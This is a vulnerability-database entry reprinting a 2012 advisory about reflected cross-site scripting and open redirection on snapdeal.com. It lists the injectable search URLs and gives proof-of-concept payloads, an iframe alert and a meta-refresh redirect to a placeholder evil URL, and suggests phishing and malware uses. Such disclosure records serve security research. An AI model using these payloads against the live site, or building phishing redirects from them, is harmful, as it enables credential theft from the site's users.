Vulners
Lucene search
Snapdeal.com Cross Site Scripting / Redirection
`Site: http://www.snapdeal.com
Threat/Vulnerability: Cross site scripting a.k.a XSS, URL Redirection
Severity : Moderate
Author: Karthik R a.k.a 3psil0nlambda
I have informed the owner (CEO) but got no response, acknowledgement of receipt of the mail.
About the Site:
India's fastest growing shopping site.
Vulnerability:
*XSS a.k.a Cross site scripting
*URL Redirection
Once found out the Vulnerability, it can be used in the following URL to create any attacks.
*Installing malware in the name of Snapdeal.com and gain credit card and other important credentials
*Phishing URL Redirection, and gain login-ID and password
URL used for crafting attacks:-
*http://www.snapdeal.com/search?categoryId=0&keyword= <inject XSS attack here> &vertical=all&clickSrc=go_recent&locId=0
*http://www.snapdeal.com/products/lifestyle-handbags-wallets?q=Brand:Jute Planet,A-maze&sort= <inject XSS attack here>
Exploit:
*XSS : "><IFRAME SRC="javascript:alert('XSS');"></IFRAME>
*URL Redirection: "><meta HTTP-EQUIV="REFRESH" content="0; url=EVIL URL">
Greetz to side-effects, r4dc0re, lord crusader, team inject0r
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 May 2012 00:00Current
7.4High risk
Vulners AI Score7.4